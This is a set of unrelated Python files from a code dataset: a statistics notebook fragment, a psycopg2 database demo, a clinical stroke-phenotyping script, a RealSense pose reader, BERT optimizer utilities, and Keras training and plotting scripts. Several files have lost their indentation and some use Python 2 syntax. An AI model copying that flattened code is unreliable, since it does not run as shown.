sns.violinplot(y='birth_place',x='height',data=df , color="0.8" )
sns.stripplot(y='birth_place',x='height',data=df , zorder=1 )
plt.show()
#Under represented labels : not a good feature
sns.violinplot(y='hair_colour',x='height',data=df , color="0.8" )
sns.stripplot(y='hair_colour',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='eye_colour',x='height',data=df , color="0.8" )
sns.stripplot(y='eye_colour',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='diet',x='height',data=df , color="0.8" )
sns.stripplot(y='diet',x='height',data=df , zorder=1 )
plt.show()
#Again, no ANOVA for us here
print('Kruskal test for hair colour')
stats.kruskal(df.height[df.hair_colour=='lb'] , df.height[df.hair_colour=='db'], df.height[df.hair_colour=='bl'])
print('Kruskal test for eye colour')
stats.kruskal(df.height[df.eye_colour=='1'] , df.height[df.eye_colour=='2'], df.height[df.eye_colour=='3'], df.height[df.eye_colour=='4'])
print('Kruskal test for diet')
stats.kruskal(df.height[df.diet=='1'] , df.height[df.diet=='2'], df.height[df.diet=='3'], df.height[df.diet=='4'])
corre=df.corr(method='pearson')
from scipy.stats import kendalltau, pearsonr, spearmanr
def kendall_pval(x,y):
return kendalltau(x,y)[1]
def pearsonr_pval(x,y):
return pearsonr(x,y)[1]
def spearmanr_pval(x,y):
return spearmanr(x,y)[1]
corre_pval=df.corr(method=pearsonr_pval)
df_corr_pval = pd.DataFrame(corre_pval,columns=corre.columns)
import statsmodels.stats.multitest as ssm
corre_pval_adj=np.array([list(ssm.multipletests([np.array(corre_pval)[i][j]if j!=i else 1 for j in range(np.array(corre_pval).shape[1])]
,alpha=0.05,method='fdr_bh',is_sorted=False,returnsorted=False)[1])
for i in range(np.array(corre_pval).shape[0])])
df_corr_pval_adj = pd.DataFrame(corre_pval_adj,columns=corre.columns)
dico_columns={j:i for i,j in enumerate(list(df_corr_pval_adj.columns))}
oo=['height','shoe_size','weight','R_wrist_girth','L_wrist_girth',
'nb_siblings_M','nb_siblings','nb_siblings_F','height_M','height_F']
new_dico_columns={j:i for i,j in enumerate(oo)}
dico_swap={dico_columns[s]:new_dico_columns[s] for s in dico_columns.keys()}
dico_swap={new_dico_columns[s]:dico_columns[s] for s in dico_columns.keys()}
the_matrix2=np.array(df_corr_pval_adj)
the_matrix=np.array([[the_matrix2[dico_swap[i],dico_swap[j]] for j in range(len(the_matrix2))]for i in range(len(the_matrix2))])
def highlight_cell(x,y, ax=None, **kwargs):
rect = plt.Rectangle((x-.5, y-.5), 1,1, fill=False, **kwargs)
ax = ax or plt.gca()
ax.add_patch(rect)
return rect
a=sns.clustermap(corre,z_score=None,row_cluster=True,col_cluster=True,method='ward',cmap='coolwarm',
vmax=1,vmin=-1, annot=True, annot_kws={"size": 15})
a.ax_heatmap.set_title('Clustered pearson correlation\nbetween covariables',pad=100)
b=a.ax_heatmap
pp=0
for i in range(len(the_matrix)):
for j in range(len(the_matrix)):
if the_matrix[i][j]<0.05:
if pp==0:
highlight_cell(i+0.5,j+0.5,ax=b,color='k',linewidth=3,label='Significant multiple\ntesting adjusted pvalue<0.05')
else:
highlight_cell(i+0.5,j+0.5,ax=b,color='k',linewidth=3)
pp+=1
b.legend(loc='best', bbox_to_anchor=(1, 0.8, 0.8, 0.5))
plt.show()
sns.violinplot(y='gender',x='shoe_size',data=df , color="0.8" )
sns.stripplot(y='gender',x='shoe_size',data=df , zorder=1 )
plt.show()
sns.violinplot(y='diet',x='shoe_size',data=df , color="0.8" )
sns.stripplot(y='diet',x='shoe_size',data=df , zorder=1 )
plt.show()
print('Kruskal test for diet vs shoe size')
stats.kruskal(df.shoe_size[df.diet=='1'] , df.shoe_size[df.diet=='2'], df.shoe_size[df.diet=='3'], df.shoe_size[df.diet=='4'])
print('Kruskal test for diet vs height')
stats.kruskal(df.height_M[df.diet=='1'] , df.height_M[df.diet=='2'], df.height_M[df.diet=='3'], df.height_M[df.diet=='4'])
ordered_loglike=[]
for p in ['shoe_size','height_M','nb_siblings_F']:
model=smf.ols(formula='height ~ '+p, data=df)
results = model.fit()
res=results.summary()
print(res)
#### a little bit of gymnastic to get this summary saved and usable.
results_as_html = res.tables[0].as_html()
result_general_df2=pd.read_html(results_as_html, header=0, index_col=0)[0]
list1=["Dep. Variable:"]+list(result_general_df2.index)+[result_general_df2.columns[1]]+list(result_general_df2[result_general_df2.columns[1]])
list2=[result_general_df2.columns[0]]+list(result_general_df2[result_general_df2.columns[0]])+[result_general_df2.columns[2]]+list(result_general_df2[result_general_df2.columns[2]])
dico_i={s:v for s,v in zip(list1,list2)}
result_general_df=pd.DataFrame([[dico_i[v]] for v in list1],index=list1,columns=['Value'])
results_as_html = res.tables[1].as_html()
result_fit_df=pd.read_html(results_as_html, header=0, index_col=0)[0]
ordered_loglike.append([p,float(result_general_df['Value']["Log-Likelihood:"]),result_fit_df])
ordered_loglike=sorted(ordered_loglike,key=itemgetter(1),reverse=True)
print([v[0] for v in ordered_loglike])
list_co=[]
ordered_loglike_multi=[]
for p in [v[0] for v in ordered_loglike]:
list_co.append(p)
model=smf.ols(formula='height ~ '+'+'.join(list_co), data=df)
results = model.fit()
res=results.summary()
print(res)
#### a little bit of gymnastic to get this summary saved and usable.
results_as_html = res.tables[0].as_html()
result_general_df2=pd.read_html(results_as_html, header=0, index_col=0)[0]
list1=["Dep. Variable:"]+list(result_general_df2.index)+[result_general_df2.columns[1]]+list(result_general_df2[result_general_df2.columns[1]])
list2=[result_general_df2.columns[0]]+list(result_general_df2[result_general_df2.columns[0]])+[result_general_df2.columns[2]]+list(result_general_df2[result_general_df2.columns[2]])
dico_i={s:v for s,v in zip(list1,list2)}
result_general_df=pd.DataFrame([[dico_i[v]] for v in list1],index=list1,columns=['Value'])
results_as_html = res.tables[1].as_html()
result_fit_df=pd.read_html(results_as_html, header=0, index_col=0)[0]
ordered_loglike_multi.append(['_'.join(list_co),float(result_general_df['Value']["Log-Likelihood:"]),result_fit_df])
ordered_loglike_multi=sorted(ordered_loglike_multi,key=itemgetter(1),reverse=True)
print()
print('Modles',[v[0] for v in ordered_loglike_multi])
print('Log-Likelihood',[v[1] for v in ordered_loglike_multi])
print()
ordered_log_name=[v[0] for v in ordered_loglike_multi][::-1]
ordered_log_value=[v[1] for v in ordered_loglike_multi][::-1]
for i in range(1,len(ordered_log_value)):
pval=1-stats.chi2.cdf(2*(ordered_log_value[i]-ordered_log_value[i-1]),1)
print("The log likelihood difference between model {0} and model {1} \n is associated to a P value={2}".format(ordered_log_name[i-1],ordered_log_name[i],pval))
print() | StarcoderdataPython |
11349 | <reponame>catcherwong-archive/2019<gh_stars>10-100
# -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
class PgDemo:
    """Minimal psycopg2 CRUD demo against table t1(id, name, gender, create_time).

    Conventions visible in this class: create_time is stored as a millisecond
    Unix timestamp and gender is 1 = male, anything else printed as female.
    """

    def __init__(self, host, port, db, user, pwd):
        """Store connection parameters; no connection is opened yet."""
        self.host = host
        self.port = port
        self.db = db
        self.user = user
        # Bug fix: this line previously read `self.pwd = <PASSWORD>` (a
        # redaction placeholder), which is a SyntaxError.
        self.pwd = pwd

    def getConnection(self):
        """Open and return a new database connection, or None on failure.

        NOTE(review): callers use `with self.getConnection() as conn`; when
        the connect fails this returns None and the `with` statement raises
        — confirm whether that fallthrough is intended.
        """
        conn = None
        try:
            conn = psycopg2.connect(
                host=self.host,
                port=self.port,
                database=self.db,
                user=self.user,
                password=self.pwd,
            )
        except Exception as err:
            print("can not connect to the database,%s" % err)
        return conn

    def query_all(self):
        """Print every row of t1 as a tab-separated table."""
        with self.getConnection() as conn:
            sql = "select id, name, gender, create_time from t1"
            # Cursor is created before the try so `finally` can never hit an
            # unbound name (previously cursor() failing raised NameError).
            cur = conn.cursor()
            try:
                cur.execute(sql)
                res = cur.fetchall()
                print("id\tname\tgender\ttime")
                for d in res:
                    print("%d\t%s\t%s\t%s" % (d[0], d[1], "male" if d[2] == 1 else "female", self.timestamp2datetime(d[3], False)))
            except Exception as err:
                print("query all fail, %s" % err)
            finally:
                cur.close()

    def query_lastone(self):
        """Print the most recently created row of t1."""
        with self.getConnection() as conn:
            sql = "select id, name, gender, create_time from t1 order by create_time desc limit 1"
            cur = conn.cursor()
            try:
                cur.execute(sql)
                res = cur.fetchone()
                print("id\tname\tgender\ttime")
                print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
            except Exception as err:
                print("query lastone fail, %s" % err)
            finally:
                cur.close()

    def query_byname(self, name):
        """Print the first row of t1 whose name equals *name* (parameterized)."""
        with self.getConnection() as conn:
            sql = "select id, name, gender, create_time from t1 where name = %s"
            cur = conn.cursor()
            try:
                cur.execute(sql, (name, ))
                res = cur.fetchone()
                print("id\tname\tgender\ttime")
                print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
            except Exception as err:
                print("query by name fail, %s" % err)
            finally:
                cur.close()

    def insert_one(self, name, gender):
        """Insert one row with the current millisecond timestamp."""
        with self.getConnection() as conn:
            sql = " insert into t1(name, gender, create_time) values(%s, %s, %s) "
            cur = conn.cursor()
            try:
                cur.execute(sql, (name, gender, self.getCurrentTimestamp()))
                print("insert ok")
            except Exception as err:
                print("insert one fail, %s" % err)
            finally:
                cur.close()

    def update_genderbyid(self, id, gender):
        """Set the gender of the row with primary key *id*."""
        with self.getConnection() as conn:
            sql = " update t1 set gender = %s where id = %s "
            cur = conn.cursor()
            try:
                cur.execute(sql, (gender, id))
                print("update ok")
            except Exception as err:
                print("update gender by id fail, %s" % err)
            finally:
                cur.close()

    def delete_byname(self, name):
        """Delete every row whose name equals *name*."""
        with self.getConnection() as conn:
            sql = " delete from t1 where name = %s "
            cur = conn.cursor()
            try:
                cur.execute(sql, (name, ))
                print("delete ok")
            except Exception as err:
                print("delete by name fail, %s" % err)
            finally:
                cur.close()

    def getCurrentTimestamp(self):
        """Return the current time as integer milliseconds (also printed)."""
        ts = int(round(time.time() * 1000))
        print(ts)
        return ts

    def timestamp2datetime(self, timestamp, issecond):
        """Format a Unix timestamp as a local-time string.

        Args:
            timestamp: seconds when *issecond* is truthy, else milliseconds.
            issecond: selects the input unit and output precision
                (millisecond input keeps 3 fractional digits).
        """
        if issecond:
            t = datetime.datetime.fromtimestamp(timestamp)
            return t.strftime("%Y-%m-%d %H:%M:%S")
        t = datetime.datetime.fromtimestamp(timestamp / 1000)
        return t.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
if __name__ == "__main__":
pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
print("===========insert_one==============")
pg.insert_one("wong", 1)
print("===========query_all==============")
pg.query_all()
print("===========query_lastone==============")
pg.query_lastone()
print("===========query_byname==============")
pg.query_byname("catcher")
print("===========update_genderbyid==============")
pg.update_genderbyid(4, 2)
print("===========delete_byname==============")
pg.delete_byname("wong")
print("===========query_all==============")
pg.query_all()
| StarcoderdataPython |
3218878 | <reponame>pthangaraj/Stroke-Phenotyping
#By <NAME> (<EMAIL>), <NAME> Lab at Columbia University Irving Medical Center
#Part of manuscript: "Comparative analysis, applications, and interpretation of electronic health record-based stroke phenotyping methods"
#This script makes the training matrix with collapsed features
import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
| StarcoderdataPython |
1679111 | #!/usr/bin/python
# -*- coding: utf-8 -*-
## License: Apache 2.0. See LICENSE file in root directory.
## Copyright(c) 2019 Intel Corporation. All Rights Reserved.
#####################################################
## librealsense T265 rpy example ##
#####################################################
# First import the library
import pyrealsense2 as rs
import math as m
# Declare RealSense pipeline, encapsulating the actual device and sensors
pipe = rs.pipeline()
# Build config object and request pose data
cfg = rs.config()
cfg.enable_stream(rs.stream.pose)
# Start streaming with requested config
pipe.start(cfg)
try:
    while (True):
        # Wait for the next set of frames from the camera
        frames = pipe.wait_for_frames()
        # Fetch pose frame
        pose = frames.get_pose_frame()
        if pose:
            # Print some of the pose data to the terminal
            data = pose.get_pose_data()
            # Euler angles from pose quaternion
            # See also https://github.com/IntelRealSense/librealsense/issues/5178#issuecomment-549795232
            # and https://github.com/IntelRealSense/librealsense/issues/5178#issuecomment-550217609
            # Re-map the T265 quaternion axes (per the issues above) before
            # converting to roll/pitch/yaw in degrees.
            w = data.rotation.w
            x = -data.rotation.z
            y = data.rotation.x
            z = -data.rotation.y
            pitch = -m.asin(2.0 * (x*z - w*y)) * 180.0 / m.pi;
            roll = m.atan2(2.0 * (w*x + y*z), w*w - x*x - y*y + z*z) * 180.0 / m.pi;
            yaw = m.atan2(2.0 * (w*z + x*y), w*w + x*x - y*y - z*z) * 180.0 / m.pi;
            print("Frame #{}".format(pose.frame_number))
            print("RPY [deg]: Roll: {0:.7f}, Pitch: {1:.7f}, Yaw: {2:.7f}".format(roll, pitch, yaw))
finally:
    # Always release the device, even on Ctrl-C.
    pipe.stop()
113766 | <reponame>Tongjilibo/bert4torch
import math
from typing import Callable, Iterable, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
from torch.optim.lr_scheduler import LambdaLR
def get_linear_schedule_with_warmup(optimizer, num_warmup_steps, num_training_steps, last_epoch=-1):
    """Linear warmup followed by linear decay to zero.

    The learning-rate multiplier rises from 0 to 1 over ``num_warmup_steps``
    steps, then falls linearly to 0 at ``num_training_steps``.

    Args:
        optimizer: the wrapped torch optimizer.
        num_warmup_steps: warmup length, typically
            ``num_training_steps * warmup_proportion`` (0.05-0.15 suggested).
        num_training_steps: total training steps, typically
            ``train_batches * num_epoch``.
        last_epoch: index of the last step when resuming (default -1).
    """
    def lr_lambda(step: int):
        if step < num_warmup_steps:
            # Warmup phase: ramp linearly from 0 up to 1.
            return float(step) / float(max(1, num_warmup_steps))
        # Decay phase: ramp linearly down to 0, clamped at 0 past the end.
        remaining = float(num_training_steps - step)
        span = float(max(1, num_training_steps - num_warmup_steps))
        return max(0.0, remaining / span)

    return LambdaLR(optimizer, lr_lambda, last_epoch)
class AdamW(Optimizer):
    """
    Adam with decoupled weight decay (AdamW).
    See "Decoupled Weight Decay Regularization" <https://arxiv.org/abs/1711.05101>`__.

    Args:
        params (:obj:`Iterable[torch.nn.parameter.Parameter]`):
            Parameters (or parameter groups) to optimize.
        lr (:obj:`float`, `optional`, defaults to 1e-3):
            Learning rate.
        betas (:obj:`Tuple[float,float]`, `optional`, defaults to (0.9, 0.999)):
            Adam's (b1, b2) coefficients for the moment estimates.
        eps (:obj:`float`, `optional`, defaults to 1e-6):
            Adam's epsilon term, for numerical stability.
        weight_decay (:obj:`float`, `optional`, defaults to 0):
            Decoupled weight-decay coefficient.
        correct_bias (:obj:`bool`, `optional`, defaults to `True`):
            Apply Adam's bias correction. (The original TF BERT does not
            correct the bias, i.e. uses False; True may converge more stably.)

    Example:
        param_optimizer = list(model.named_parameters())
        no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
        optimizer_grouped_parameters = [
            {'params': [p for n, p in param_optimizer
                        if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
            {'params': [p for n, p in param_optimizer
                        if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
        ]
        optimizer = AdamW(optimizer_grouped_parameters, lr=1e-5, correct_bias=False)
    """
    def __init__(
        self,
        params: Iterable[torch.nn.parameter.Parameter],
        lr: float = 1e-3,
        betas: Tuple[float, float] = (0.9, 0.999),
        eps: float = 1e-6,
        weight_decay: float = 0.0,
        correct_bias: bool = True,
    ):
        if lr < 0.0:
            raise ValueError(f"Invalid learning rate: {lr} - should be >= 0.0")
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError(f"Invalid beta parameter: {betas[0]} - should be in [0.0, 1.0[")
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError(f"Invalid beta parameter: {betas[1]} - should be in [0.0, 1.0[")
        if not 0.0 <= eps:
            raise ValueError(f"Invalid epsilon value: {eps} - should be >= 0.0")
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay, correct_bias=correct_bias)
        super().__init__(params, defaults)

    def step(self, closure: Callable = None):
        """
        Perform a single optimization step.

        Args:
            closure (:obj:`Callable`, `optional`):
                A closure that re-evaluates the model and returns the loss.
        """
        loss = None
        if closure is not None:
            with torch.enable_grad():
                loss = closure()
        for group in self.param_groups:
            for p in group["params"]:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError("Adam does not support sparse gradients, please consider SparseAdam instead")
                state = self.state[p]
                # Lazy per-parameter state initialization on the first step.
                if len(state) == 0:
                    state["step"] = 0
                    # Exponential moving average of gradients (first moment).
                    state["exp_avg"] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradients (second moment).
                    state["exp_avg_sq"] = torch.zeros_like(p.data)
                exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
                beta1, beta2 = group["betas"]
                state["step"] += 1
                # Decay the moment estimates and fold in the new gradient.
                exp_avg.mul_(beta1).add_(grad, alpha=1.0 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1.0 - beta2)
                denom = exp_avg_sq.sqrt().add_(group["eps"])
                step_size = group["lr"]
                # Bias correction; skipped when mimicking the original TF BERT.
                if group["correct_bias"]:
                    bias_correction1 = 1.0 - beta1 ** state["step"]
                    bias_correction2 = 1.0 - beta2 ** state["step"]
                    step_size = step_size * math.sqrt(bias_correction2) / bias_correction1
                p.data.addcdiv_(exp_avg, denom, value=-step_size)
                # Decoupled weight decay: applied directly to the weights so
                # every parameter decays by the same proportion, avoiding the
                # poor interaction of L2 regularization with Adam's m/v terms
                # (equivalent to L2 regularization under plain SGD).
                if group["weight_decay"] > 0.0:
                    p.data.add_(p.data, alpha=-group["lr"] * group["weight_decay"])
        return loss
class ExponentialMovingAverage():
    '''
    Exponential moving average (EMA) of the model weights.
    Note: this is unrelated to the EMA of first/second gradient moments kept by
    adaptive optimizers such as Adam — the two are completely different things.
    Example:
        # init
        ema = ExponentialMovingAverage(model, 0.999)
        # during training, after the parameters are updated, sync the EMA weights
        def train():
            optimizer.step()
            ema.update()
        # before eval, apply the EMA weights; after eval, restore the originals
        def evaluate():
            ema.apply_ema_weights()
            # evaluate
            # to save the EMA model, call torch.save() before reset_old_weights()
            ema.reset_old_weights()
    '''
    def __init__(self, model, decay):
        self.model = model
        self.decay = decay
        # EMA weights (running average of every trainable parameter).
        self.ema_weights = {}
        # Original model weights, saved while evaluating so they can be restored
        # after swapping the EMA weights out again.
        self.model_weights = {}
        # Initialize ema_weights from the current model weights.
        for name, param in self.model.named_parameters():
            if param.requires_grad:
                self.ema_weights[name] = param.data.clone()
    def update(self):
        # new_ema = (1 - decay) * current + decay * previous_ema
        for name, param in self.model.named_parameters():
            if param.requires_grad:
                assert name in self.ema_weights
                new_average = (1.0 - self.decay) * param.data + self.decay * self.ema_weights[name]
                self.ema_weights[name] = new_average.clone()
    def apply_ema_weights(self):
        # Save the live weights, then swap the EMA weights into the model.
        for name, param in self.model.named_parameters():
            if param.requires_grad:
                assert name in self.ema_weights
                self.model_weights[name] = param.data
                param.data = self.ema_weights[name]
    def reset_old_weights(self):
        # Restore the live weights that apply_ema_weights() saved, then clear them.
        for name, param in self.model.named_parameters():
            if param.requires_grad:
                assert name in self.model_weights
                param.data = self.model_weights[name]
        self.model_weights = {}
# def extend_with_exponential_moving_average(BaseOptimizer, model):
# class EmaOptimizer(BaseOptimizer):
# # @insert_arguments(ema_momentum=0.999)
# def __init__(self, model, *args, **kwargs):
# super(EmaOptimizer, self).__init__(*args, **kwargs)
# self.model = model
# # 保存ema权重(当前step的每一层的滑动平均权重)
# self.ema_weights = {}
# # 在进行evaluate的时候,保存原始的模型权重,当执行完evaluate后,从ema权重恢复到原始权重
# self.model_weights = {}
# # 初始化ema_weights为model_weights
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# self.ema_weights[name] = param.data.clone()
# def step(sel, closure: Callable = None):
# """
# 执行单步优化
# 参数:
# closure (:obj:`Callable`, `optional`):
# 评估模型并返回loss,是一个闭包
# """
# loss = None
# if closure is not None:
# loss = closure()
# loss = super(NewOptimizer, self).step()
# self.update()
# return loss
# def update(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.ema_weights
# new_average = (1.0 - self.decay) * param.data + self.decay * self.ema_weights[name]
# self.ema_weights[name] = new_average.clone()
# def apply_ema_weights(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.ema_weights
# self.model_weights[name] = param.data
# param.data = self.ema_weights[name]
# def reset_old_weights(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.model_weights
# param.data = self.model_weights[name]
# self.model_weights = {}
# return EmaOptimizer | StarcoderdataPython |
3278274 | <gh_stars>0
# -*- coding: utf-8 -*-
#from keras.applications.inception_v3 import InceptionV3
from keras.models import Model,load_model
from keras.layers import Dense,GlobalAveragePooling2D,Flatten, Input
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.resnet50 import preprocess_input, decode_predictions
import numpy as np
# Train a ResNet50 from scratch (weights=None) on 200x200 grayscale images,
# classifying into 34 classes.
input_tensor = Input(shape=(200,200,1))
model = ResNet50(include_top=True,weights=None,input_tensor =input_tensor,classes=34)
model.compile(optimizer='rmsprop',
              loss='categorical_crossentropy',
              metrics=['accuracy'])
# Rescale pixel values from [0, 255] to [0, 1].
train_datagen = image.ImageDataGenerator(rescale=1./255)
test_datagen = image.ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
        'dataset42',
        target_size=(200, 200),
        color_mode='grayscale',
        batch_size=84)
#colormode
# NOTE(review): validation data is read from 'data/train' — presumably this
# should point at a held-out validation directory; confirm before trusting
# the reported validation metrics.
validation_generator = test_datagen.flow_from_directory(
        'data/train',
        target_size=(200, 200),
        color_mode='grayscale',
        batch_size=84)
model.fit_generator(
        train_generator,
        steps_per_epoch=17,
        epochs=10,
        validation_data=validation_generator,
        validation_steps=4)
model.save('weight3.h5')
# ,validation_data=validation_generator, validation_steps=30
| StarcoderdataPython |
48268 | import pandas as pd
import utils as ut
import constants as cs
import matplotlib.pyplot as plt
import numpy as np
import datetime
import calendar
import time
import math
# Create list of files to analyze
def createFileList(results_path, scenario_list, scenario_file):
    """Return the per-scenario result file paths: <results_path><name>/<scenario_file>.

    Each entry of scenario_list is a sequence whose first element is the
    scenario directory name.
    """
    return [results_path + scenario[0] + '/' + scenario_file
            for scenario in scenario_list]
def line_plot_summary_hourly_analysis(file_list, scenario_list, plot_parameter, plot_output_file, plot_title):
    """Plot plot_parameter per hourly interval, one line per scenario, and save as PDF.
    NOTE: Python 2 syntax (print statements)."""
    scenario_count = 0
    scenario_colors = ['lightblue', 'lightgreen', 'lightgrey', 'cyan', 'magenta', 'darkgrey', 'khaki', 'limegreen']
    # Creating Plot
    fig1 = plt.figure(figsize=(7, 6))
    plt.suptitle(plot_title, fontsize=20)
    ax1 = plt.subplot(111)
    for i in file_list:
        scenario = scenario_list[scenario_count][0]
        df = pd.read_csv(i, delimiter=',')
        # x axis: 1..N hourly intervals; y axis: the selected summary column.
        x_axis_data = range(1, len(df) + 1)
        y_axis_data = df[plot_parameter].tolist()
        print y_axis_data
        l1 = ax1.plot(x_axis_data, y_axis_data, color=scenario_colors[scenario_count], label=scenario, linewidth=1.5)
        scenario_count += 1
    ax1.grid(True)
    handles, labels = ax1.get_legend_handles_labels()
    # ut.flip presumably reorders legend entries for a 2-row layout — TODO confirm.
    plt.legend(ut.flip(handles, 2), ut.flip(labels, 2), bbox_to_anchor=(0.5, 1.12), loc=9, ncol=4, prop={'size':15})
    ax1.set_xlabel('Hourly Interval', fontsize=20)
    ax1.set_ylabel(plot_parameter, fontsize=20)
    fig1.savefig(plot_output_file, format='pdf')
    print "Saving to %s" %(plot_output_file)
    #plt.show()
def bar_plot_average_hourly_analysis(file_list, scenario_list, plot_parameter, plot_output_file, plot_title):
    """Aggregate plot_parameter over all hours per scenario and draw a bar chart.
    Also prints ad-hoc percentage comparisons between scenarios to stdout.
    NOTE: Python 2 syntax (print statements)."""
    scenario_patterns = [ "/" , "\\" , "|" , "-" , "+" , "x", "o", "O", ".", "*" ]
    scenario_count = 0
    # Creating Plot
    fig1 = plt.figure(figsize=(7, 6))
    plt.suptitle(plot_title, fontsize=20)
    ax1 = fig1.add_subplot(111)
    # Create X Axis
    x_axis_list = []
    for i in scenario_list:
        x_axis_list.append(i[0])
    x_axis_list = x_axis_list
    y_axis_list = []
    for i in file_list:
        # NOTE(review): scenario_count is never incremented in this function,
        # so `scenario` is always scenario_list[0][0]; it is also unused below.
        scenario = scenario_list[scenario_count][0]
        df = pd.read_csv(i, delimiter=',')
        # Aggregation depends on the column: mean for request/latency columns,
        # sum for bytes/duration/500s, derived ratio for error rate.
        if (plot_parameter == cs.HOUR_SUMMARY_SUM_REQS_SUCCESS or plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
            # describe().iloc[1] is the mean row of the summary statistics.
            y_axis_data = df[plot_parameter].describe().iloc[1]
            if plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY:
                # Convert ms to seconds — presumably; confirm source units.
                y_axis_data = y_axis_data / 1000
        if (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED or plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION or plot_parameter == cs.HOUR_SUMMARY_SUM_RESP_500):
            y_axis_data = df[plot_parameter].sum()
        if (plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION):
            print df[plot_parameter].tolist()
            # Seconds -> hours.
